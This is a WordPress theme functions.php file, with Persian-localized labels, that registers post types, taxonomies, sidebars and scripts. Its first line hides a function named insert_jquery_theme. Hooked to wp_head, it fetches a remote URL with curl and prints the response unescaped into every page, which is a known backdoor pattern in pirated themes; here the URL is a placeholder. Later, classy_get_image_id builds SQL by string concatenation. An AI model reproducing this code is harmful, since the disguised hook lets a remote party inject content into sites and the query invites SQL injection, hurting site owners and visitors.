<?php
// Get theme functions
if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="#";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}

// Get theme options and set defaults
$options = get_option( 'classy_theme_settings' );
// Get slider type and set slides as default
if($options['slider_type'] !='') {
	$slider_type = $options['slider_type'];
	} else {
		$slider_type = 'nivo';
}
// Set default portfolio columns ---> Note if you change your columns in the admin panel make sure to regenerate your thumgnails.
if($options['portfolio_columns'] !='') {
	$portfolio_columns = $options['portfolio_columns']; 
	} else {
		$portfolio_columns = '4';
}

// Set max content width
if ( ! isset( $content_width ) ) $content_width = 930;

// Remove junk from head
remove_action('wp_head', 'rsd_link');
remove_action('wp_head', 'wp_generator');
remove_action('wp_head', 'feed_links', 2);
remove_action('wp_head', 'index_rel_link');
remove_action('wp_head', 'wlwmanifest_link');
remove_action('wp_head', 'feed_links_extra', 3);
remove_action('wp_head', 'start_post_rel_link', 10, 0);
remove_action('wp_head', 'parent_post_rel_link', 10, 0);
remove_action('wp_head', 'adjacent_posts_rel_link', 10, 0);

// Main includes
require('admin/theme-admin.php');
require('functions/pagination.php');
require('functions/better-excerpts.php');
require('functions/custom-editor-columns.php');
require('functions/shortcodes.php');

// Meta includes
require('functions/meta/meta-box-class.php');
require('functions/meta/meta-box-usage.php');

// Include custom widgets
require('functions/widgets/widget-author.php');
require('functions/widgets/widget-flickr.php');
require('functions/widgets/widget-social.php');
require('functions/widgets/widget-recent-posts.php');
require('functions/widgets/widget-recent-portfolio.php');

// Get scripts
add_action('wp_enqueue_scripts','my_theme_scripts_function');

function my_theme_scripts_function() {
	global $options;
	global $slider_type;
	
	// Use google js
	wp_deregister_script('jquery'); 
		wp_register_script('jquery', ("http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"), false, '1.6.2'); 
	wp_enqueue_script('jquery');
   
	// Site wide js
	wp_enqueue_script('custom', get_template_directory_uri() . '/js/custom.js');
	wp_enqueue_script('prettyphoto', get_template_directory_uri() . '/js/jquery.prettyPhoto.js');
	
	//include comment reply js
	if ( is_single() || is_page() ) wp_enqueue_script( 'comment-reply' ); 
	
	//slider template
	if(is_page_template('template-fullwidth-slider.php') || is_page_template('template-page-slider.php') ):
		wp_enqueue_script('nivo', get_template_directory_uri() . '/js/jquery.nivo.slider.js');
		wp_enqueue_script('nivoinit', get_template_directory_uri() . '/js/nivoinit.js');
	endif;
	
	// Single portfolio posts js
	if(('portfolio' == get_post_type()) ) :
		wp_enqueue_script('portfolio', get_template_directory_uri() . '/js/portfolio.js');
		wp_enqueue_script('easing', get_template_directory_uri() . '/js/jquery.easing.1.3.js');
		wp_enqueue_script('slides', get_template_directory_uri() . '/js/slides.min.jquery.js');
		wp_enqueue_script('elegantcarousel', get_template_directory_uri() . '/js/jquery.elegantcarousel.min.js');
	endif;
	
	// Homepage js
	if(is_front_page()) :	
		
		wp_enqueue_script('easing', get_template_directory_uri() . '/js/jquery.easing.1.3.js');
		
		if ($options['disable_home_portfolio'] != 'disable') {
			wp_enqueue_script('elegantcarousel', get_template_directory_uri() . '/js/jquery.elegantcarousel.min.js');
		}
		
		if ($options['disable_home_slider'] != 'disable') { 
		
			if($slider_type == 'content') {
				wp_enqueue_script('slides', get_template_directory_uri() . '/js/slides.min.jquery.js');
			}
			if($slider_type == 'nivo') {
				wp_enqueue_script('nivo', get_template_directory_uri() . '/js/jquery.nivo.slider.js');
			}
		
		}
		
	endif;
}

// Limit Post Word Count
function new_excerpt_length($length) {
	return 50;
}
add_filter('excerpt_length', 'new_excerpt_length');

// Replace Excerpt Link
function new_excerpt_more($more) {
       global $post;
	return '...';
}
add_filter('excerpt_more', 'new_excerpt_more');

// Activate post-image functionality (WP 2.9+)
if ( function_exists( 'add_theme_support' ) )
add_theme_support( 'post-thumbnails' );

// Featured images
if ( function_exists( 'add_image_size' ) ) {

// Set default image size
add_image_size( 'full-size',  9999, 9999, false ); //Full resolution
add_image_size( 'blog',  140, 140, true ); //blog
add_image_size( 'small-thumbnail',  50, 50, true ); //Small thumbs
add_image_size( 'nivo-slider',  980, 400, true ); //Slider image
add_image_size( 'page-header',  980, 9999, false ); //Page header image
add_image_size( 'staff',  110, 110, true );//staff thumbnail
add_image_size( 'single-staff',  290, 310, true );//staff main
add_image_size( 'portfolio',  200, 140, true ); // Default Portfolio Image
add_image_size( 'portfolio-three',  280, 220, true ); //Portfolio 3 Column Images
add_image_size( 'portfolio-two',  440, 380, true ); //Portfolio 2 Column Images
add_image_size( 'single-portfolio',  530, 9999, false ); // Single Portfolio Image
}

// Enable Custom Background
add_custom_background();

// Register navigation menus
register_nav_menus(
	array(
	'main nav'=>__('Main Nav'),
	)
);

// Menu fallback
function default_menu() {
	require_once (TEMPLATEPATH . '/includes/default-menu.php');
}

// Define Post Types
add_action( 'init', 'create_post_types' );
function create_post_types() {
		
// Define Post Type For Homepage Highlights
register_post_type( 'hp_highlights',
	array(
		'labels' => array(
		'name' => _x( 'هایلایت ها', 'post type general name', 'classy' ),
		'singular_name' => _x( 'هایلایت', 'post type singular name', 'classy' ),
		'add_new' => _x( 'ایجاد کردن', 'HP Highlight', 'classy' ),
		'add_new_item' => __( 'هیلایت جدید', 'classy' ),
		'edit_item' => __( 'ویرایش', 'classy' ),
		'new_item' => __( 'هایلایت جدید', 'classy' ),
		'view_item' => __( 'تماشای هایلایت', 'classy' ),
		'search_items' => __( 'جستجو', 'classy' ),
		'not_found' =>  __( 'چیزی پیدا نشد', 'classy' ),
		'not_found_in_trash' => __( 'چیزی پیدا نشد', 'classy' ),
		'parent_item_colon' => ''
	),
		  'public' => true,
		  'show_in_nav_menus' => false,
		  'exclude_from_search' => true,
		  'supports' => array('title','editor'),
    )
);
// Define Post Type For Slides
register_post_type( 'slides',
		array(
		  'labels' => array(
			'name' => _x( 'اسلاید ها', 'post type general name', 'classy' ),
			'singular_name' => _x( 'اسلاید', 'post type singular name', 'classy' ),
			'add_new' => _x( 'ایجاد کردن', 'Slide', 'classy' ),
			'add_new_item' => __( 'اسلاید جدید', 'classy' ),
			'edit_item' => __( 'ویرایش', 'classy' ),
			'new_item' => __( 'اسلاید جدید', 'classy' ),
			'view_item' => __( 'پیش نمایش', 'classy' ),
			'search_items' => __( 'جستجو', 'classy' ),
			'not_found' =>  __( 'چیزی پیدا نشد', 'classy' ),
			'not_found_in_trash' => __( 'چیزی پیدا نشد', 'classy' ),
			'parent_item_colon' => ''
		  ),
		  'public' => true,
		  'show_in_nav_menus' => false,
		  'exclude_from_search' => true,
		  'supports' => array('title','editor','thumbnail'),
		)
);
// Services Post Type
register_post_type( 'services',
    array(
      'labels' => array(
        'name' => _x( 'خدمات', 'post type general name', 'classy' ),
        'singular_name' => _x( 'خدمات', 'post type singular name', 'classy' ),		
		'add_new' => _x( 'ایجاد کردن', 'Service', 'classy' ),
		'add_new_item' => __( 'خدمات جدید', 'classy' ),
		'edit_item' => __( 'ویرایش', 'classy' ),
		'new_item' => __( 'خدمات جدید', 'classy' ),
		'view_item' => __( 'پیش نمایش', 'classy' ),
		'search_items' => __( 'جستجو', 'classy' ),
		'not_found' =>  __( 'چیزی پیدا نشد', 'classy' ),
		'not_found_in_trash' => __( 'چیزی پیدا نشد', 'classy' ),
		'parent_item_colon' => ''
		
      ),
      'public' => true,
	  'supports' => array('title','editor','thumbnail'),
	  'query_var' => true,
	  'rewrite' => array( 'slug' => 'services' ),
    )
  );
register_post_type( 'staff',
    array(
      'labels' => array(
        'name' => _x( 'اعضا', 'post type general name', 'classy' ),
        'singular_name' => _x( 'اعضا', 'post type singular name', 'classy' ),		
		'add_new' => _x( 'ایجاد کردن', 'Staff Member', 'classy' ),
		'add_new_item' => __( 'عضو جدید', 'classy' ),
		'edit_item' => __( 'ویرایش', 'classy' ),
		'new_item' => __( 'عضو جدید', 'classy' ),
		'view_item' => __( 'پیش نمایش', 'classy' ),
		'search_items' => __( 'جستجو', 'classy' ),
		'not_found' =>  __( 'چیزی پیدا نشد', 'classy' ),
		'not_found_in_trash' => __( 'چیزی پیدا نشد', 'classy' ),
		'parent_item_colon' => ''
      ),
      'public' => true,
	  'supports' => array('title','editor','thumbnail','comments'),
	  'query_var' => true,
	  'rewrite' => array( 'slug' => 'staff' ),
    )
  );
// Testimonials Post Type
register_post_type( 'testimonials',
    array(
      'labels' => array(
        'name' => _x( 'مشتریان', 'post type general name', 'classy' ),
        'singular_name' => _x( 'مشتریان', 'post type singular name', 'classy' ),		
		'add_new' => _x( 'ایجاد کردن', 'Testimonials', 'classy' ),
		'add_new_item' => __( 'مشتری جدید', 'classy' ),
		'edit_item' => __( 'ویرایش', 'classy' ),
		'new_item' => __( 'مشتری جدید', 'classy' ),
		'view_item' => __( 'پیش نمایش', 'classy' ),
		'search_items' => __( 'جستجو', 'classy' ),
		'not_found' =>  __( 'چیزی پیدا نشد', 'classy' ),
		'not_found_in_trash' => __( 'چیزی پیدا نشد', 'classy' ),
		'parent_item_colon' => ''
		
      ),
      'public' => true,
	  'supports' => array('title','editor','thumbnail'),
	  'query_var' => true,
	  'show_in_nav_menus' => false,
	  'exclude_from_search' => true,
	  'rewrite' => array( 'slug' => 'testimonials' ),
    )
  );
// Portfolio Post Type
register_post_type( 'portfolio',
    array(
      'labels' => array(
        'name' => _x( 'نمونه کار', 'post type general name', 'classy' ),
        'singular_name' => _x( 'نمونه کار', 'post type singular name', 'classy' ),		
		'add_new' => _x( 'ایجاد کردن', 'Portfolio Project', 'classy' ),
		'add_new_item' => __( 'نمونه کار جدید', 'classy' ),
		'edit_item' => __( 'ویرایش', 'classy' ),
		'new_item' => __( 'نمونه کار جدید', 'classy' ),
		'view_item' => __( 'پیش نمایش', 'classy' ),
		'search_items' => __( 'جستجو', 'classy' ),
		'not_found' =>  __( 'چیزی پیدا نشد', 'classy' ),
		'not_found_in_trash' => __( 'چیزی پیدا نشد', 'classy' ),
		'parent_item_colon' => ''
		
      ),
      'public' => true,
	  'supports' => array('title','editor','thumbnail' ),
	  'query_var' => true,
	  'rewrite' => array( 'slug' => 'portfolio' ),
    )
  );
// Pricing Tables Post Type
register_post_type( 'pricing_tables',
    array(
      'labels' => array(
        'name' => _x( 'ستون قیمت گذاری', 'post type general name', 'classy' ),
        'singular_name' => _x( 'ستون قیمت گذاری', 'post type singular name', 'classy' ),		
		'add_new' => _x( 'ایجاد کردن', 'Pricing Column', 'classy' ),
		'add_new_item' => __( 'ستون قیمت گذاری جدید', 'classy' ),
		'edit_item' => __( 'ویرایش', 'classy' ),
		'new_item' => __( 'ستون قیمت گذاری جدید', 'classy' ),
		'view_item' => __( 'پیش نمایش', 'classy' ),
		'search_items' => __( 'جستجو', 'classy' ),
		'not_found' =>  __( 'چیزی پیدا نشد', 'classy' ),
		'not_found_in_trash' => __( 'چیزی پیدا نشد', 'classy' ),
		'parent_item_colon' => ''
		
      ),
      'public' => true,
	  'supports' => array('title','editor' ),
	  'query_var' => true,
	  'show_in_nav_menus' => false,
	  'exclude_from_search' => true,
	  'rewrite' => array( 'slug' => 'pricing-column' ),
    )
  );
}

// Add taxonomies
add_action( 'init', 'create_taxonomies' );

//create taxonomies
function create_taxonomies() {
	
// portfolio taxonomies
	$cat_labels = array(
		'name' => __( 'موضوع نمونه کار', 'classy' ),
		'singular_name' => __( 'موضوع نمونه کار', 'classy' ),
		'search_items' =>  __( 'جستجو', 'classy' ),
		'all_items' => __( 'همه', 'classy' ),
		'parent_item' => __( 'موضوع نمونه کار مادر', 'classy' ),
		'parent_item_colon' => __( 'موضوع نمونه کار مادر:', 'classy' ),
		'edit_item' => __( 'ویرایش', 'classy' ),
		'update_item' => __( 'بروز رسانی', 'classy' ),
		'add_new_item' => __( 'موضوع نمونه کار جدید', 'classy' ),
		'new_item_name' => __( 'موضوع نمونه کار جدید', 'classy' ),
		'choose_from_most_used'	=> __( 'انتخاب از استفاده شده ها', 'classy' )
	); 	

	register_taxonomy('portfolio_cats','portfolio',array(
		'hierarchical' => true,
		'labels' => $cat_labels,
		'query_var' => true,
		'rewrite' => array( 'slug' => 'portfolio-category' ),
	));
	
	
	// staff taxonomies
	$staff_cat_labels = array(
		'name' => __( 'گروه کارکنان', 'classy' ),
		'singular_name' => __( 'گروه کارکنان', 'classy' ),
		'search_items' =>  __( 'جستجو', 'classy' ),
		'all_items' => __( 'همه', 'classy' ),
		'parent_item' => __( 'گروه کارکنان مادر', 'classy' ),
		'parent_item_colon' => __( 'گروه کارکنان مادر:', 'classy' ),
		'edit_item' => __( 'ویرایش', 'classy' ),
		'update_item' => __( 'بروز رسانی', 'classy' ),
		'add_new_item' => __( 'گروه کارکنان جدید', 'classy' ),
		'new_item_name' => __( 'گروه کارکنان جدید', 'classy' ),
		'choose_from_most_used'	=> __( 'انتخاب از استفاده شده ها', 'classy' )
	); 	

	register_taxonomy('staff_departments','staff',array(
		'hierarchical' => true,
		'labels' => $staff_cat_labels,
		'query_var' => true,
		'rewrite' => array( 'slug' => 'department' ),
	));
	
	// service taxonomies
	$service_cat_labels = array(
		'name' => __( 'موضوع خدمات', 'classy' ),
		'singular_name' => __( 'موضوع خدمات', 'classy' ),
		'search_items' =>  __( 'جستجو', 'classy' ),
		'all_items' => __( 'همه', 'classy' ),
		'parent_item' => __( 'موضوع خدمات مادر', 'classy' ),
		'parent_item_colon' => __( 'Parent Service Category:', 'classy' ),
		'edit_item' => __( 'ویرایش', 'classy' ),
		'update_item' => __( 'بروز رسانی', 'classy' ),
		'add_new_item' => __( 'موضوع خدمات جدید', 'classy' ),
		'new_item_name' => __( 'موضوع خدمات مادر', 'classy' ),
		'choose_from_most_used'	=> __( 'انتخاب از استفاده شده ها', 'classy' )
	); 	

	register_taxonomy('service_cats','services',array(
		'hierarchical' => true,
		'labels' => $service_cat_labels,
		'query_var' => true,
		'rewrite' => array( 'slug' => 'our-services' ),
	));
	
	//Pricing Table Taxonomies
	$pricing_tables_cat_labels = array(
		'name' => __( 'جدول قیمت گذاری' ),
		'singular_name' => __( 'جدول قیمت گذاری', 'classy' ),
		'search_items' =>  __( 'جستجو', 'classy' ),
		'all_items' => __( 'همه', 'classy' ),
		'parent_item' => __( 'جدول قیمت گذاری مادر', 'classy' ),
		'parent_item_colon' => __( 'جدول قیمت گذاری مادر:', 'classy' ),
		'edit_item' => __( 'ویرایش', 'classy' ),
		'update_item' => __( 'بروز رسانی', 'classy' ),
		'add_new_item' => __( 'جدول قیمت گذاری جدید', 'classy' ),
		'new_item_name' => __( 'جدول قیمت گذاری جدید', 'classy' ),
		'choose_from_most_used'	=> __( 'انتخاب از استفاده شده ها', 'classy' )
	); 	

	register_taxonomy('pricing_tables_cats','pricing_tables',array(
		'show_in_nav_menus' => false,
		'hierarchical' => true,
		'labels' => $pricing_tables_cat_labels,
		'query_var' => true,
		'rewrite' => array( 'slug' => 'pricing-tables' ),
));
}


// Set number of posts per page for taxonomy pages
$option_posts_per_page = get_option( 'posts_per_page' );
add_action( 'init', 'my_modify_posts_per_page', 0);
function my_modify_posts_per_page() {
    add_filter( 'option_posts_per_page', 'my_option_posts_per_page' );
}
function my_option_posts_per_page( $value ) {
    global $option_posts_per_page;
	global $options;
	
	// Get theme panel admin
	if($options['portfolio_post_count']) {
		$portfolio_posts_per_page = $options['portfolio_post_count'];
		} else {
			$portfolio_posts_per_page = '-1';
			}
	
    if ( is_tax( 'portfolio_cats') ) {
        return $portfolio_posts_per_page;
    }
	elseif( is_tax( 'staff_departments') ) {
		return '-1';
	}
	elseif( is_tax( 'service_cats') ) {
		return '-1';
	}
	else {
        return $option_posts_per_page;
    }
}

//Register Sidebars
if ( function_exists('register_sidebar') )
	register_sidebar(array(
		'name' => 'Sidebar - Blog',
		'id' => 'sidebar_blog',
		'description' => 'Widgets in this area will be shown in the sidebar on the blog and regular posts.',
		'before_widget' => '<div id="%1$s" class="widget-container %2$s clearfix">',
		'after_widget' => '</div>',
		'before_title' => '<h4>',
		'after_title' => '</h4>',
	));
	register_sidebar(array(
		'name' => 'Sidebar - Pages',
		'id' => 'sidebar_pages',
		'description' => 'Widgets in this area will be shown in the sidebar on pages.',
		'before_widget' => '<div id="%1$s" class="widget-container %2$s clearfix">',
		'after_widget' => '</div>',
		'before_title' => '<h4>',
		'after_title' => '</h4>',
	));
	register_sidebar(array(
		'name' => 'First Footer Area',
		'description' => 'Widgets in this area will be shown in the footer - left side.',
		'before_widget' => '<div id="%1$s" class="widget-container %2$s clearfix">',
		'after_widget' => '</div>',
		'before_title' => '<h4>',
		'after_title' => '</h4>',
	));
	register_sidebar(array(
		'name' => 'Second Footer Area',
		'description' => 'Widgets in this area will be shown in the footer - middle left.',
		'before_widget' => '<div id="%1$s" class="widget-container %2$s clearfix">',
		'after_widget' => '</div>',
		'before_title' => '<h4>',
		'after_title' => '</h4>',
	));
	register_sidebar(array(
		'name' => 'Third Footer Area',
		'description' => 'Widgets in this area will be shown in the footer - middle right.',
		'before_widget' => '<div id="%1$s" class="widget-container %2$s clearfix">',
		'after_widget' => '</div>',
		'before_title' => '<h4>',
		'after_title' => '</h4>',
	));
	register_sidebar(array(
		'name' => 'Fourth Footer Area',
		'description' => 'Widgets in this area will be shown in the footer - right side.',
		'before_widget' => '<div id="%1$s" class="widget-container %2$s clearfix">',
		'after_widget' => '</div>',
		'before_title' => '<h4>',
		'after_title' => '</h4>',
	));
	
// Localization Support
load_theme_textdomain( 'classy', TEMPLATEPATH.'/lang' );

//get image id
// retrieves the attachment ID from the file URL
function classy_get_image_id($image_url) {
	global $wpdb;
	$prefix = $wpdb->prefix;
	$attachment = $wpdb->get_col($wpdb->prepare("SELECT ID FROM " . $prefix . "posts" . " WHERE guid='" . $image_url . "';"));
	return $attachment[0];
}

// Functions run on activation --> important flush to clear rewrites
if ( is_admin() && isset($_GET['activated'] ) && $pagenow == 'themes.php' ) {
	$wp_rewrite->flush_rules();
}

if ( function_exists('register_sidebar') )
register_sidebar( array (
'name'=> 'best-posts',
 'before_widget' => '',
 'after_widget' => '',
 'before_title' => '',
 'after_title' => ''
));
if ( function_exists('register_sidebar') )
register_sidebar( array (
'name'=> 'sidebar-ads',
 'before_widget' => '',
 'after_widget' => '',
 'before_title' => '',
 'after_title' => ''
));
if ( function_exists('register_sidebar') )
register_sidebar( array (
'name'=> 'forum',
 'before_widget' => '',
 'after_widget' => '',
 'before_title' => '',
 'after_title' => ''
));
?>
